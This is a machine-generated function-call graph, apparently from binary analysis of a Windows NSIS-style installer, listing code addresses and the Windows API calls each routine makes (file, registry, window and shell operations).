3632->3633 3634 4062de 3632->3634 3636 406423 3633->3636 3637 406319 3633->3637 3659 406158 GetFileAttributesW CreateFileW 3634->3659 3636->3470 3637->3636 3639 406321 wsprintfA 3637->3639 3638 4062e8 CloseHandle GetShortPathNameW 3638->3636 3640 4062fc 3638->3640 3641 4066a5 17 API calls 3639->3641 3640->3633 3640->3636 3642 406349 3641->3642 3660 406158 GetFileAttributesW CreateFileW 3642->3660 3644 406356 3644->3636 3645 406365 GetFileSize GlobalAlloc 3644->3645 3646 406387 3645->3646 3647 40641c CloseHandle 3645->3647 3648 4061db ReadFile 3646->3648 3647->3636 3649 40638f 3648->3649 3649->3647 3661 4060bd lstrlenA 3649->3661 3652 4063a6 lstrcpyA 3655 4063c8 3652->3655 3653 4063ba 3654 4060bd 4 API calls 3653->3654 3654->3655 3656 4063ff SetFilePointer 3655->3656 3657 40620a WriteFile 3656->3657 3658 406415 GlobalFree 3657->3658 3658->3647 3659->3638 3660->3644 3662 4060fe lstrlenA 3661->3662 3663 4060d7 lstrcmpiA 3662->3663 3665 406106 3662->3665 3664 4060f5 CharNextA 3663->3664 3663->3665 3664->3662 3665->3652 3665->3653 3666 401941 3667 401943 3666->3667 3672 402da6 3667->3672 3673 402db2 3672->3673 3674 4066a5 17 API calls 3673->3674 3675 402dd3 3674->3675 3676 401948 3675->3676 3677 4068ef 5 API calls 3675->3677 3678 405d74 3676->3678 3677->3676 3679 40603f 18 API calls 3678->3679 3680 405d94 3679->3680 3681 405d9c DeleteFileW 3680->3681 3682 405db3 3680->3682 3686 401951 3681->3686 3683 405ed3 3682->3683 3714 406668 lstrcpynW 3682->3714 3683->3686 3690 40699e 2 API calls 3683->3690 3685 405dd9 3687 405dec 3685->3687 3688 405ddf lstrcatW 3685->3688 3689 405f83 2 API calls 3687->3689 3691 405df2 3688->3691 3689->3691 3693 405ef8 3690->3693 3692 405e02 lstrcatW 3691->3692 3694 405e0d lstrlenW FindFirstFileW 3691->3694 3692->3694 3693->3686 3695 405f37 3 API calls 3693->3695 3694->3683 3712 405e2f 3694->3712 3696 405f02 3695->3696 3698 405d2c 5 API calls 3696->3698 3697 405eb6 FindNextFileW 3701 405ecc FindClose 3697->3701 3697->3712 3700 405f0e 3698->3700 3702 405f12 3700->3702 3703 405f28 3700->3703 3701->3683 3702->3686 3706 4056ca 24 API calls 3702->3706 3705 4056ca 24 API calls 3703->3705 3705->3686 3708 405f1f 3706->3708 3707 405d74 60 API calls 3707->3712 3710 406428 36 API calls 3708->3710 3709 4056ca 24 API calls 3709->3697 3710->3686 3711 4056ca 24 API calls 3711->3712 3712->3697 3712->3707 3712->3709 3712->3711 3713 406428 36 API calls 3712->3713 3715 406668 lstrcpynW 3712->3715 3716 405d2c 3712->3716 3713->3712 3714->3685 3715->3712 3724 406133 GetFileAttributesW 3716->3724 3719 405d59 3719->3712 3720 405d47 RemoveDirectoryW 3722 405d55 3720->3722 3721 405d4f DeleteFileW 3721->3722 3722->3719 3723 405d65 SetFileAttributesW 3722->3723 3723->3719 3725 405d38 3724->3725 3726 406145 SetFileAttributesW 3724->3726 3725->3719 3725->3720 3725->3721 3726->3725 3727 4015c1 3728 402da6 17 API calls 3727->3728 3729 4015c8 3728->3729 3730 405fe2 4 API calls 3729->3730 3740 4015d1 3730->3740 3731 401631 3733 401663 3731->3733 3734 401636 3731->3734 3732 405f64 CharNextW 3732->3740 3736 401423 24 API calls 3733->3736 3746 401423 3734->3746 3744 40165b 3736->3744 3738 405c16 2 API calls 3738->3740 3740->3731 3740->3732 3740->3738 3741 405c33 5 API calls 3740->3741 3743 401617 GetFileAttributesW 3740->3743 3745 405b99 4 API calls 3740->3745 3741->3740 3742 40164a SetCurrentDirectoryW 3742->3744 3743->3740 3745->3740 3747 4056ca 24 API calls 3746->3747 3748 401431 3747->3748 3749 406668 lstrcpynW 3748->3749 3749->3742 3930 401c43 3952 402d84 3930->3952 3932 401c4a 3933 402d84 17 API calls 3932->3933 3934 401c57 3933->3934 3935 402da6 17 API calls 3934->3935 3936 401c6c 3934->3936 3935->3936 3937 401c7c 3936->3937 3938 402da6 17 API calls 3936->3938 3939 401cd3 3937->3939 3940 401c87 3937->3940 3938->3937 3942 402da6 17 API calls 3939->3942 3941 402d84 17 API calls 3940->3941 3944 401c8c 3941->3944 3943 401cd8 3942->3943 3945 402da6 17 API calls 3943->3945 3946 402d84 17 API calls 3944->3946 3947 401ce1 FindWindowExW 3945->3947 3948 401c98 3946->3948 3951 401d03 3947->3951 3949 401cc3 SendMessageW 3948->3949 3950 401ca5 SendMessageTimeoutW 3948->3950 3949->3951 3950->3951 3953 4066a5 17 API calls 3952->3953 3954 402d99 3953->3954 3954->3932 3962 4028c4 3963 4028ca 3962->3963 3964 4028d2 FindClose 3963->3964 3965 402c2a 3963->3965 3964->3965 3771 4040c5 3772 4040dd 3771->3772 3773 40423e 3771->3773 3772->3773 3774 4040e9 3772->3774 3775 40424f GetDlgItem GetDlgItem 3773->3775 3784 40428f 3773->3784 3776 4040f4 SetWindowPos 3774->3776 3777 404107 3774->3777 3847 4045c4 3775->3847 3776->3777 3781 404110 ShowWindow 3777->3781 3782 404152 3777->3782 3779 4042e9 3780 404610 SendMessageW 3779->3780 3794 404239 3779->3794 3817 4042fb 3780->3817 3786 404130 GetWindowLongW 3781->3786 3787 40422b 3781->3787 3788 404171 3782->3788 3789 40415a DestroyWindow 3782->3789 3783 404279 KiUserCallbackDispatcher 3790 40140b 2 API calls 3783->3790 3784->3779 3785 401389 2 API calls 3784->3785 3791 4042c1 3785->3791 3786->3787 3793 404149 ShowWindow 3786->3793 3853 40462b 3787->3853 3796 404176 SetWindowLongW 3788->3796 3797 404187 3788->3797 3795 40456e 3789->3795 3790->3784 3791->3779 3798 4042c5 SendMessageW 3791->3798 3793->3782 3795->3794 3804 40457e ShowWindow 3795->3804 3796->3794 3797->3787 3801 404193 GetDlgItem 3797->3801 3798->3794 3799 40140b 2 API calls 3799->3817 3800 40454f DestroyWindow EndDialog 3800->3795 3802 4041c1 3801->3802 3803 4041a4 SendMessageW IsWindowEnabled 3801->3803 3806 4041ce 3802->3806 3807 404215 SendMessageW 3802->3807 3808 4041e1 3802->3808 3818 4041c6 3802->3818 3803->3794 3803->3802 3804->3794 3805 4066a5 17 API calls 3805->3817 3806->3807 3806->3818 3807->3787 3811 4041e9 3808->3811 3812 4041fe 3808->3812 3810 4045c4 18 API calls 3810->3817 3815 40140b 2 API calls 3811->3815 3814 40140b 2 API calls 3812->3814 3813 4041fc 3813->3787 3816 404205 3814->3816 3815->3818 3816->3787 3816->3818 3817->3799 3817->3800 3817->3805 3817->3810 3819 4045c4 18 API calls 3817->3819 3850 40459d 3818->3850 3820 404376 GetDlgItem 3819->3820 3821 404393 ShowWindow EnableWindow 3820->3821 3822 40438b 3820->3822 3867 4045e6 EnableWindow 3821->3867 3822->3821 3824 4043bd EnableWindow 3829 4043d1 3824->3829 3825 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3826 404406 SendMessageW 3825->3826 3825->3829 3826->3829 3828 4040a6 18 API calls 3828->3829 3829->3825 3829->3828 3868 4045f9 SendMessageW 3829->3868 3869 406668 lstrcpynW 3829->3869 3831 404435 lstrlenW 3832 4066a5 17 API calls 3831->3832 3833 40444b SetWindowTextW 3832->3833 3834 401389 2 API calls 3833->3834 3835 40445c 3834->3835 3835->3794 3835->3817 3836 40448f DestroyWindow 3835->3836 3838 40448a 3835->3838 3836->3795 3837 4044a9 CreateDialogParamW 3836->3837 3837->3795 3839 4044dc 3837->3839 3838->3794 3840 4045c4 18 API calls 3839->3840 3841 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3840->3841 3842 401389 2 API calls 3841->3842 3843 40452d 3842->3843 3843->3794 3844 404535 ShowWindow 3843->3844 3845 404610 SendMessageW 3844->3845 3846 40454d 3845->3846 3846->3795 3848 4066a5 17 API calls 3847->3848 3849 4045cf SetDlgItemTextW 3848->3849 3849->3783 3851 4045a4 3850->3851 3852 4045aa SendMessageW 3850->3852 3851->3852 3852->3813 3854 4046ee 3853->3854 3855 404643 GetWindowLongW 3853->3855 3854->3794 3855->3854 3856 404658 3855->3856 3856->3854 3857 404685 GetSysColor 3856->3857 3858 404688 3856->3858 3857->3858 3859 404698 SetBkMode 3858->3859 3860 40468e SetTextColor 3858->3860 3861 4046b0 GetSysColor 3859->3861 3862 4046b6 3859->3862 3860->3859 3861->3862 3863 4046bd SetBkColor 3862->3863 3864 4046c7 3862->3864 3863->3864 3864->3854 3865 4046e1 CreateBrushIndirect 3864->3865 3866 4046da DeleteObject 3864->3866 3865->3854 3866->3865 3867->3824 3868->3829 3869->3831 3969 4016cc 3970 402da6 17 API calls 3969->3970 3971 4016d2 GetFullPathNameW 3970->3971 3972 4016ec 3971->3972 3978 40170e 3971->3978 3975 40699e 2 API calls 3972->3975 3972->3978 3973 401723 GetShortPathNameW 3974 402c2a 3973->3974 3976 4016fe 3975->3976 3976->3978 3979 406668 lstrcpynW 3976->3979 3978->3973 3978->3974 3979->3978 3980 401e4e GetDC 3981 402d84 17 API calls 3980->3981 3982 401e60 GetDeviceCaps MulDiv ReleaseDC 3981->3982 3983 402d84 17 API calls 3982->3983 3984 401e91 3983->3984 3985 4066a5 17 API calls 3984->3985 3986 401ece CreateFontIndirectW 3985->3986 3987 402638 3986->3987 3987->3987 3988 402950 3989 402da6 17 API calls 3988->3989 3991 40295c 3989->3991 3990 402972 3993 406133 2 API calls 3990->3993 3991->3990 3992 402da6 17 API calls 3991->3992 3992->3990 3994 402978 3993->3994 4016 406158 GetFileAttributesW CreateFileW 3994->4016 3996 402985 3997 402a3b 3996->3997 3998 4029a0 GlobalAlloc 3996->3998 3999 402a23 3996->3999 4000 402a42 DeleteFileW 3997->4000 4001 402a55 3997->4001 3998->3999 4002 4029b9 3998->4002 4003 403371 44 API calls 3999->4003 4000->4001 4017 4035f8 SetFilePointer 4002->4017 4005 402a30 CloseHandle 4003->4005 4005->3997 4006 4029bf 4007 4035e2 ReadFile 4006->4007 4008 4029c8 GlobalAlloc 4007->4008 4009 4029d8 4008->4009 4010 402a0c 4008->4010 4011 403371 44 API calls 4009->4011 4012 40620a WriteFile 4010->4012 4015 4029e5 4011->4015 4013 402a18 GlobalFree 4012->4013 4013->3999 4014 402a03 GlobalFree 4014->4010 4015->4014 4016->3996 4017->4006 4025 403cd5 4026 403ce0 4025->4026 4027 403ce4 4026->4027 4028 403ce7 GlobalAlloc 4026->4028 4028->4027 4029 401956 4030 402da6 17 API calls 4029->4030 4031 40195d lstrlenW 4030->4031 4032 402638 4031->4032 4033 4014d7 4034 402d84 17 API calls 4033->4034 4035 4014dd Sleep 4034->4035 4037 402c2a 4035->4037 4038 4020d8 4039 4020ea 4038->4039 4049 40219c 4038->4049 4040 402da6 17 API calls 4039->4040 4041 4020f1 4040->4041 4043 402da6 17 API calls 4041->4043 4042 401423 24 API calls 4044 4022f6 4042->4044 4045 4020fa 4043->4045 4046 402110 LoadLibraryExW 4045->4046 4047 402102 GetModuleHandleW 4045->4047 4048 402121 4046->4048 4046->4049 4047->4046 4047->4048 4058 406aa4 4048->4058 4049->4042 4052 402132 4055 401423 24 API calls 4052->4055 4056 402142 4052->4056 4053 40216b 4054 4056ca 24 API calls 4053->4054 4054->4056 4055->4056 4056->4044 4057 40218e FreeLibrary 4056->4057 4057->4044 4063 40668a WideCharToMultiByte 4058->4063 4060 406ac1 4061 406ac8 GetProcAddress 4060->4061 4062 40212c 4060->4062 4061->4062 4062->4052 4062->4053 4063->4060 4064 402b59 4065 402b60 4064->4065 4066 402bab 4064->4066 4068 402ba9 4065->4068 4070 402d84 17 API calls 4065->4070 4067 406a35 5 API calls 4066->4067 4069 402bb2 4067->4069 4071 402da6 17 API calls 4069->4071 4072 402b6e 4070->4072 4073 402bbb 4071->4073 4074 402d84 17 API calls 4072->4074 4073->4068 4075 402bbf IIDFromString 4073->4075 4077 402b7a 4074->4077 4075->4068 4076 402bce 4075->4076 4076->4068 4082 406668 lstrcpynW 4076->4082 4081 4065af wsprintfW 4077->4081 4080 402beb CoTaskMemFree 4080->4068 4081->4068 4082->4080 4083 402a5b 4084 402d84 17 API calls 4083->4084 4085 402a61 4084->4085 4086 402aa4 4085->4086 4087 402a88 4085->4087 4092 40292e 4085->4092 4089 402abe 4086->4089 4090 402aae 4086->4090 4088 402a8d 4087->4088 4096 402a9e 4087->4096 4097 406668 lstrcpynW 4088->4097 4091 4066a5 17 API calls 4089->4091 4093 402d84 17 API calls 4090->4093 4091->4096 4093->4096 4096->4092 4098 4065af wsprintfW 4096->4098 4097->4092 4098->4092 3883 40175c 3884 402da6 17 API calls 3883->3884 3885 401763 3884->3885 3886 406187 2 API calls 3885->3886 3887 40176a 3886->3887 3888 406187 2 API calls 3887->3888 3888->3887 4099 401d5d 4100 402d84 17 API calls 4099->4100 4101 401d6e SetWindowLongW 4100->4101 4102 402c2a 4101->4102 4103 4028de 4104 4028e6 4103->4104 4105 4028ea FindNextFileW 4104->4105 4106 4028fc 4104->4106 4105->4106 4107 402943 4105->4107 4109 406668 lstrcpynW 4107->4109 4109->4106 4110 406d5f 4116 406be3 4110->4116 4111 40754e 4112 406c64 GlobalFree 4113 406c6d GlobalAlloc 4112->4113 4113->4111 4113->4116 4114 406ce4 GlobalAlloc 4114->4111 4114->4116 4115 406cdb GlobalFree 4115->4114 4116->4111 4116->4112 4116->4113 4116->4114 4116->4115 4117 401563 4118 402ba4 4117->4118 4121 4065af wsprintfW 4118->4121 4120 402ba9 4121->4120 4122 401968 4123 402d84 17 API calls 4122->4123 4124 40196f 4123->4124 4125 402d84 17 API calls 4124->4125 4126 40197c 4125->4126 4127 402da6 17 API calls 4126->4127 4128 401993 lstrlenW 4127->4128 4130 4019a4 4128->4130 4129 4019e5 4130->4129 4134 406668 lstrcpynW 4130->4134 4132 4019d5 4132->4129 4133 4019da lstrlenW 4132->4133 4133->4129 4134->4132 4142 40166a 4143 402da6 17 API calls 4142->4143 4144 401670 4143->4144 4145 40699e 2 API calls 4144->4145 4146 401676 4145->4146 4147 402aeb 4148 402d84 17 API calls 4147->4148 4149 402af1 4148->4149 4150 4066a5 17 API calls 4149->4150 4151 40292e 4149->4151 4150->4151 4152 4026ec 4153 402d84 17 API calls 4152->4153 4154 4026fb 4153->4154 4155 402745 ReadFile 4154->4155 4156 4061db ReadFile 4154->4156 4157 402785 MultiByteToWideChar 4154->4157 4158 40283a 4154->4158 4161 4027ab SetFilePointer MultiByteToWideChar 4154->4161 4162 40284b 4154->4162 4164 402838 4154->4164 4165 406239 SetFilePointer 4154->4165 4155->4154 4155->4164 4156->4154 4157->4154 4174 4065af wsprintfW 4158->4174 4161->4154 4163 40286c SetFilePointer 4162->4163 4162->4164 4163->4164 4166 406255 4165->4166 4173 40626d 4165->4173 4167 4061db ReadFile 4166->4167 4168 406261 4167->4168 4169 406276 SetFilePointer 4168->4169 4170 40629e SetFilePointer 4168->4170 4168->4173 4169->4170 4171 406281 4169->4171 4170->4173 4172 40620a WriteFile 4171->4172 4172->4173 4173->4154 4174->4164 4175 404a6e 4176 404aa4 4175->4176 4177 404a7e 4175->4177 4179 40462b 8 API calls 4176->4179 4178 4045c4 18 API calls 4177->4178 4180 404a8b SetDlgItemTextW 4178->4180 4181 404ab0 4179->4181 4180->4176 3889 40176f 3890 402da6 17 API calls 3889->3890 3891 401776 3890->3891 3892 401796 3891->3892 3893 40179e 3891->3893 3928 406668 lstrcpynW 3892->3928 3929 406668 lstrcpynW 3893->3929 3896 40179c 3900 4068ef 5 API calls 3896->3900 3897 4017a9 3898 405f37 3 API calls 3897->3898 3899 4017af lstrcatW 3898->3899 3899->3896 3920 4017bb 3900->3920 3901 40699e 2 API calls 3901->3920 3902 406133 2 API calls 3902->3920 3904 4017cd CompareFileTime 3904->3920 3905 40188d 3907 4056ca 24 API calls 3905->3907 3906 401864 3908 4056ca 24 API calls 3906->3908 3916 401879 3906->3916 3909 401897 3907->3909 3908->3916 3910 403371 44 API calls 3909->3910 3911 4018aa 3910->3911 3912 4018be SetFileTime 3911->3912 3913 4018d0 FindCloseChangeNotification 3911->3913 3912->3913 3915 4018e1 3913->3915 3913->3916 3914 4066a5 17 API calls 3914->3920 3918 4018e6 3915->3918 3919 4018f9 3915->3919 3917 406668 lstrcpynW 3917->3920 3921 4066a5 17 API calls 3918->3921 3922 4066a5 17 API calls 3919->3922 3920->3901 3920->3902 3920->3904 3920->3905 3920->3906 3920->3914 3920->3917 3923 405cc8 MessageBoxIndirectW 3920->3923 3927 406158 GetFileAttributesW CreateFileW 3920->3927 3924 4018ee lstrcatW 3921->3924 3925 401901 3922->3925 3923->3920 3924->3925 3926 405cc8 MessageBoxIndirectW 3925->3926 3926->3916 3927->3920 3928->3896 3929->3897 4182 401a72 4183 402d84 17 API calls 4182->4183 4184 401a7b 4183->4184 4185 402d84 17 API calls 4184->4185 4186 401a20 4185->4186 4187 401573 4188 401583 ShowWindow 4187->4188 4189 40158c 4187->4189 4188->4189 4190 402c2a 4189->4190 4191 40159a ShowWindow 4189->4191 4191->4190 4192 4023f4 4193 402da6 17 API calls 4192->4193 4194 402403 4193->4194 4195 402da6 17 API calls 4194->4195 4196 40240c 4195->4196 4197 402da6 17 API calls 4196->4197 4198 402416 GetPrivateProfileStringW 4197->4198 4199 4014f5 SetForegroundWindow 4200 402c2a 4199->4200 4201 401ff6 4202 402da6 17 API calls 4201->4202 4203 401ffd 4202->4203 4204 40699e 2 API calls 4203->4204 4205 402003 4204->4205 4206 402014 4205->4206 4208 4065af wsprintfW 4205->4208 4208->4206 4209 401b77 4210 402da6 17 API calls 4209->4210 4211 401b7e 4210->4211 4212 402d84 17 API calls 4211->4212 4213 401b87 wsprintfW 4212->4213 4214 402c2a 4213->4214 4215 4046fa lstrcpynW lstrlenW 4216 40167b 4217 402da6 17 API calls 4216->4217 4218 401682 4217->4218 4219 402da6 17 API calls 4218->4219 4220 40168b 4219->4220 4221 402da6 17 API calls 4220->4221 4222 401694 MoveFileW 4221->4222 4223 4016a0 4222->4223 4224 4016a7 4222->4224 4226 401423 24 API calls 4223->4226 4225 40699e 2 API calls 4224->4225 4228 4022f6 4224->4228 4227 4016b6 4225->4227 4226->4228 4227->4228 4229 406428 36 API calls 4227->4229 4229->4223 4237 4019ff 4238 402da6 17 API calls 4237->4238 4239 401a06 4238->4239 4240 402da6 17 API calls 4239->4240 4241 401a0f 4240->4241 4242 401a16 lstrcmpiW 4241->4242 4243 401a28 lstrcmpW 4241->4243 4244 401a1c 4242->4244 4243->4244 4245 4022ff 4246 402da6 17 API calls 4245->4246 4247 402305 4246->4247 4248 402da6 17 API calls 4247->4248 4249 40230e 4248->4249 4250 402da6 17 API calls 4249->4250 4251 402317 4250->4251 4252 40699e 2 API calls 4251->4252 4253 402320 4252->4253 4254 402331 lstrlenW lstrlenW 4253->4254 4258 402324 4253->4258 4256 4056ca 24 API calls 4254->4256 4255 4056ca 24 API calls 4259 40232c 4255->4259 4257 40236f SHFileOperationW 4256->4257 4257->4258 4257->4259 4258->4255 4258->4259 4260 401000 4261 401037 BeginPaint GetClientRect 4260->4261 4262 40100c DefWindowProcW 4260->4262 4264 4010f3 4261->4264 4265 401179 4262->4265 4266 401073 CreateBrushIndirect FillRect DeleteObject 4264->4266 4267 4010fc 4264->4267 4266->4264 4268 401102 CreateFontIndirectW 4267->4268 4269 401167 EndPaint 4267->4269 4268->4269 4270 401112 6 API calls 4268->4270 4269->4265 4270->4269 4271 401d81 4272 401d94 GetDlgItem 4271->4272 4273 401d87 4271->4273 4275 401d8e 4272->4275 4274 402d84 17 API calls 4273->4274 4274->4275 4276 402da6 17 API calls 4275->4276 4278 401dd5 GetClientRect LoadImageW SendMessageW 4275->4278 4276->4278 4279 401e33 4278->4279 4281 401e3f 4278->4281 4280 401e38 DeleteObject 4279->4280 4279->4281 4280->4281 4282 401503 4283 40150b 4282->4283 4285 40151e 4282->4285 4284 402d84 17 API calls 4283->4284 4284->4285 4286 404783 4287 40479b 4286->4287 4291 4048b5 4286->4291 4292 4045c4 18 API calls 4287->4292 4288 40491f 4289 4049e9 4288->4289 4290 404929 GetDlgItem 4288->4290 4297 40462b 8 API calls 4289->4297 4293 404943 4290->4293 4294 4049aa 4290->4294 4291->4288 4291->4289 4295 4048f0 GetDlgItem SendMessageW 4291->4295 4296 404802 4292->4296 4293->4294 4300 404969 SendMessageW LoadCursorW SetCursor 4293->4300 4294->4289 4301 4049bc 4294->4301 4319 4045e6 EnableWindow 4295->4319 4299 4045c4 18 API calls 4296->4299 4307 4049e4 4297->4307 4303 40480f CheckDlgButton 4299->4303 4323 404a32 4300->4323 4305 4049d2 4301->4305 4306 4049c2 SendMessageW 4301->4306 4302 40491a 4320 404a0e 4302->4320 4317 4045e6 EnableWindow 4303->4317 4305->4307 4308 4049d8 SendMessageW 4305->4308 4306->4305 4308->4307 4312 40482d GetDlgItem 4318 4045f9 SendMessageW 4312->4318 4314 404843 SendMessageW 4315 404860 GetSysColor 4314->4315 4316 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4314->4316 4315->4316 4316->4307 4317->4312 4318->4314 4319->4302 4321 404a21 SendMessageW 4320->4321 4322 404a1c 4320->4322 4321->4288 4322->4321 4326 405c8e ShellExecuteExW 4323->4326 4325 404998 LoadCursorW SetCursor 4325->4294 4326->4325 4327 402383 4328 40238a 4327->4328 4331 40239d 4327->4331 4329 4066a5 17 API calls 4328->4329 4330 402397 4329->4330 4332 405cc8 MessageBoxIndirectW 4330->4332 4332->4331 4333 402c05 SendMessageW 4334 402c2a 4333->4334 4335 402c1f InvalidateRect 4333->4335 4335->4334 4336 405809 4337 4059b3 4336->4337 4338 40582a GetDlgItem GetDlgItem GetDlgItem 4336->4338 4340 4059bc GetDlgItem CreateThread CloseHandle 4337->4340 4342 4059e4 4337->4342 4381 4045f9 SendMessageW 4338->4381 4340->4342 4341 40589a 4351 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4341->4351 4343 405a0f 4342->4343 4344 405a34 4342->4344 4345 4059fb ShowWindow ShowWindow 4342->4345 4346 405a6f 4343->4346 4348 405a23 4343->4348 4349 405a49 ShowWindow 4343->4349 4350 40462b 8 API calls 4344->4350 4383 4045f9 SendMessageW 4345->4383 4346->4344 4352 405a7d SendMessageW 4346->4352 4353 40459d SendMessageW 4348->4353 4355 405a69 4349->4355 4356 405a5b 4349->4356 4354 405a42 4350->4354 4357 4058f3 SendMessageW SendMessageW 4351->4357 4358 40590f 4351->4358 4352->4354 4359 405a96 CreatePopupMenu 4352->4359 4353->4344 4363 40459d SendMessageW 4355->4363 4362 4056ca 24 API calls 4356->4362 4357->4358 4360 405922 4358->4360 4361 405914 SendMessageW 4358->4361 4364 4066a5 17 API calls 4359->4364 4365 4045c4 18 API calls 4360->4365 4361->4360 4362->4355 4363->4346 4366 405aa6 AppendMenuW 4364->4366 4367 405932 4365->4367 4368 405ac3 GetWindowRect 4366->4368 4369 405ad6 TrackPopupMenu 4366->4369 4370 40593b ShowWindow 4367->4370 4371 40596f GetDlgItem SendMessageW 4367->4371 4368->4369 4369->4354 4372 405af1 4369->4372 4373 405951 ShowWindow 4370->4373 4374 40595e 4370->4374 4371->4354 4375 405996 SendMessageW SendMessageW 4371->4375 4376 405b0d SendMessageW 4372->4376 4373->4374 4382 4045f9 SendMessageW 4374->4382 4375->4354 4376->4376 4377 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4376->4377 4379 405b4f SendMessageW 4377->4379 4379->4379 4380 405b78 GlobalUnlock SetClipboardData CloseClipboard 4379->4380 4380->4354 4381->4341 4382->4371 4383->4343 4384 40248a 4385 402da6 17 API calls 4384->4385 4386 40249c 4385->4386 4387 402da6 17 API calls 4386->4387 4388 4024a6 4387->4388 4389 4024de 4388->4389 4390 40292e 4388->4390 4391 402da6 17 API calls 4388->4391 4392 4024ea 4389->4392 4394 402d84 17 API calls 4389->4394 4393 4024d4 lstrlenW 4391->4393 4395 402509 RegSetValueExW 4392->4395 4396 403371 44 API calls 4392->4396 4393->4389 4394->4392 4397 40251f RegCloseKey 4395->4397 4396->4395 4397->4390 4399 404e0b 4400 404e37 4399->4400 4401 404e1b 4399->4401 4403 404e6a 4400->4403 4404 404e3d SHGetPathFromIDListW 4400->4404 4410 405cac GetDlgItemTextW 4401->4410 4406 404e4d 4404->4406 4409 404e54 SendMessageW 4404->4409 4405 404e28 SendMessageW 4405->4400 4407 40140b 2 API calls 4406->4407 4407->4409 4409->4403 4410->4405 4411 40290b 4412 402da6 17 API calls 4411->4412 4413 402912 FindFirstFileW 4412->4413 4414 402925 4413->4414 4415 40293a 4413->4415 4419 4065af wsprintfW 4415->4419 4417 402943 4420 406668 lstrcpynW 4417->4420 4419->4417 4420->4414 4421 40190c 4422 401943 4421->4422 4423 402da6 17 API calls 4422->4423 4424 401948 4423->4424 4425 405d74 67 API calls 4424->4425 4426 401951 4425->4426 4427 40190f 4428 402da6 17 API calls 4427->4428 4429 401916 4428->4429 4430 405cc8 MessageBoxIndirectW 4429->4430 4431 40191f 4430->4431 4432 401491 4433 4056ca 24 API calls 4432->4433 4434 401498 4433->4434 4435 402891 4436 402898 4435->4436 4442 402ba9 4435->4442 4437 402d84 17 API calls 4436->4437 4438 40289f 4437->4438 4439 4028ae SetFilePointer 4438->4439 4440 4028be 4439->4440 4439->4442 4443 4065af wsprintfW 4440->4443 4443->4442 4444 401f12 4445 402da6 17 API calls 4444->4445 4446 401f18 4445->4446 4447 402da6 17 API calls 4446->4447 4448 401f21 4447->4448 4449 402da6 17 API calls 4448->4449 4450 401f2a 4449->4450 4451 402da6 17 API calls 4450->4451 4452 401f33 4451->4452 4453 401423 24 API calls 4452->4453 4454 401f3a 4453->4454 4461 405c8e ShellExecuteExW 4454->4461 4456 401f82 4457 406ae0 5 API calls 4456->4457 4458 40292e 4456->4458 4459 401f9f CloseHandle 4457->4459 4459->4458 4461->4456 4462 402f93 4463 402fa5 SetTimer 4462->4463 4464 402fbe 4462->4464 4463->4464 4465 40300c 4464->4465 4466 403012 MulDiv 4464->4466 4467 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4466->4467 4467->4465 4483 401d17 4484 402d84 17 API calls 4483->4484 4485 401d1d IsWindow 4484->4485 4486 401a20 4485->4486 4487 401b9b 4488 401ba8 4487->4488 4489 401bec 4487->4489 4492 401c31 4488->4492 4496 401bbf 4488->4496 4490 401bf1 4489->4490 4491 401c16 GlobalAlloc 4489->4491 4497 40239d 4490->4497 4508 406668 lstrcpynW 4490->4508 4493 4066a5 17 API calls 4491->4493 4494 4066a5 17 API calls 4492->4494 4492->4497 4493->4492 4499 402397 4494->4499 4506 406668 lstrcpynW 4496->4506 4498 401c03 GlobalFree 4498->4497 4502 405cc8 MessageBoxIndirectW 4499->4502 4501 401bce 4507 406668 lstrcpynW 4501->4507 4502->4497 4504 401bdd 4509 406668 lstrcpynW 4504->4509 4506->4501 4507->4504 4508->4498 4509->4497 4510 40261c 4511 402da6 17 API calls 4510->4511 4512 402623 4511->4512 4515 406158 GetFileAttributesW CreateFileW 4512->4515 4514 40262f 4515->4514 4523 40149e 4524 4014ac PostQuitMessage 4523->4524 4525 40239d 4523->4525 4524->4525 4526 40259e 4536 402de6 4526->4536 4529 402d84 17 API calls 4530 4025b1 4529->4530 4531 4025d9 RegEnumValueW 4530->4531 4532 4025cd RegEnumKeyW 4530->4532 4533 40292e 4530->4533 4534 4025ee RegCloseKey 4531->4534 4532->4534 4534->4533 4537 402da6 17 API calls 4536->4537 4538 402dfd 4537->4538 4539 4064d5 RegOpenKeyExW 4538->4539 4540 4025a8 4539->4540 4540->4529 4541 4015a3 4542 402da6 17 API calls 4541->4542 4543 4015aa SetFileAttributesW 4542->4543 4544 4015bc 4543->4544 3750 401fa4 3751 402da6 17 API calls 3750->3751 3752 401faa 3751->3752 3753 4056ca 24 API calls 3752->3753 3754 401fb4 3753->3754 3755 405c4b 2 API calls 3754->3755 3756 401fba 3755->3756 3757 401fdd CloseHandle 3756->3757 3760 40292e 3756->3760 3765 406ae0 WaitForSingleObject 3756->3765 3757->3760 3761 401fcf 3762 401fd4 3761->3762 3763 401fdf 3761->3763 3770 4065af wsprintfW 3762->3770 3763->3757 3766 406afa 3765->3766 3767 406b0c GetExitCodeProcess 3766->3767 3768 406a71 2 API calls 3766->3768 3767->3761 3769 406b01 WaitForSingleObject 3768->3769 3769->3766 3770->3757 3870 403c25 3871 403c40 3870->3871 3872 403c36 CloseHandle 3870->3872 3873 403c54 3871->3873 3874 403c4a CloseHandle 3871->3874 3872->3871 3879 403c82 3873->3879 3874->3873 3877 405d74 67 API calls 3878 403c65 3877->3878 3880 403c90 3879->3880 3881 403c59 3880->3881 3882 403c95 FreeLibrary GlobalFree 3880->3882 3881->3877 3882->3881 3882->3882 4545 40202a 4546 402da6 17 API calls 4545->4546 4547 402031 4546->4547 4548 406a35 5 API calls 4547->4548 4549 402040 4548->4549 4550 4020cc 4549->4550 4551 40205c GlobalAlloc 4549->4551 4551->4550 4552 402070 4551->4552 4553 406a35 5 API calls 4552->4553 4554 402077 4553->4554 4555 406a35 5 API calls 4554->4555 4556 402081 4555->4556 4556->4550 4560 4065af wsprintfW 4556->4560 4558 4020ba 4561 4065af wsprintfW 4558->4561 4560->4558 4561->4550 4562 40252a 4563 402de6 17 API calls 4562->4563 4564 402534 4563->4564 4565 402da6 17 API calls 4564->4565 4566 40253d 4565->4566 4567 402548 RegQueryValueExW 4566->4567 4572 40292e 4566->4572 4568 40256e RegCloseKey 4567->4568 4569 402568 4567->4569 4568->4572 4569->4568 4573 4065af wsprintfW 4569->4573 4573->4568 